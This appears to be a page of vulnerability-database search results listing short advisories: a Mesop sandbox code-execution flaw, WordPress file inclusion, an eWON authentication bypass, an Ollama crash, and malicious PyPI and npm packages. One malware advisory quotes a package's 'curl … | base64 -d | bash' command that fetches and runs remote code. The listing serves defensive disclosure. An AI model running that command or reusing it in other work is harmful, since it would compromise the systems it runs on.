2007 matches found
Mesop AI Sandbox <= 1.2.2 - Remote Code Execution
Mesop = 1.2.2 contains an unrestricted remote code execution caused by unauthenticated ingestion and execution of base64-encoded Python code in the /exec-py endpoint of ai/testing module, letting attackers execute arbitrary commands on the host, exploit requires HTTP access to the server. id:...
CVE-2016-20077 WordPress Plugin Photocart Link 1.6 Local File Inclusion via decode.php
WordPress Plugin Photocart Link 1.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in decode.php. Attackers can supply base64-encoded file paths in the 'id' parameter to the decode.php endpoin...
EUVD-2016-10889
WordPress Plugin Photocart Link 1.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in decode.php. Attackers can supply base64-encoded file paths in the 'id' parameter to the decode.php endpoin...
CVE-2016-20077 WordPress Plugin Photocart Link 1.6 Local File Inclusion via decode.php
WordPress Plugin Photocart Link 1.6 contains a local file inclusion vulnerability that allows unauthenticated attackers to read arbitrary files by exploiting insufficient input validation in decode.php. Attackers can supply base64-encoded file paths in the 'id' parameter to the decode.php endpoin...
SolidInvoice 跨站脚本漏洞
SolidInvoice is an open-source invoice processing application developed by SolidInvoice. Versions of SolidInvoice prior to 2.3.17 contained a cross-site scripting vulnerability. This vulnerability stemmed from the company logo upload feature not verifying file types. As a result, authenticated...
MAL-2026-4812 Malicious code in m-at-star-tools (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 2934ab77e0615ccddf2cf336b023659bafca2fe94bbf2f78e4c0d2a2ba1d7bf2 The package's sole consolescript m0scan m0scan/main.py:6-7 executes curl -sL https://mspy.qzz.io/M0scan | base64 -d | bash, fetching an opaque...
Malicious code in midcorp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector bc6725ed066ed5aff9452bd82d278fd89c1548768124d8b89cb8e5a5e8c3b05a The package masquerades as a pino-compatible logger package.json keywords fast/logger/stream/json, exports module.exports.pino = middleware, lib...
CVE-2019-25470 eWON Firmware 12.2-13.0 Authentication Bypass via wsdReadForm
eWON Firmware versions 12.2 to 13.0 contain an authentication bypass vulnerability that allows attackers with minimal privileges to retrieve sensitive user data by exploiting the wsdReadForm endpoint. Attackers can send POST requests to /wrcgi.bin/wsdReadForm with base64-encoded partial credentia...
CVE-2025-15514
CVE-2025-15514 affects Ollama 0.11.5-rc0 through 0.13.5, with a null pointer dereference in multi‑modal image processing. Malformed base64 image data passed to /api/chat can cause mtmd_helper_bitmap_init_from_buf to return NULL and be dereferenced, triggering a segmentation fault and DoS. Mitigat...
CVE-2018-18753
Typecho V1.1 allows remote attackers to send shell commands via base64-encoded serialized data, as demonstrated by SSRF...
MAL-2025-191946 Malicious code in gtkfuscator (PyPI)
--- -= Per source details. Do not edit below this line.=- Source: oracle-using-macaron 83b5a97c937ac16481e2ad27346069180a0a823c5f6b361cc4e7f08e97716c24 This package decompresses and executes a base64-encoded malicious payload...
EUVD-2017-15950
Malware in sbrugna...
EUVD-2010-1346
Malware in sbrugna...
EUVD-2005-0219
Malware in sbrugna...
EUVD-2008-5837
Malware in sbrugna...
EUVD-2024-1897
Malicious code in bioql PyPI...
EUVD-2022-29730
Malicious code in bioql PyPI...
EUVD-2025-19671
Malicious code in bioql PyPI...
EUVD-2025-19856
Malicious code in bioql PyPI...
EUVD-2022-2540
Malicious code in bioql PyPI...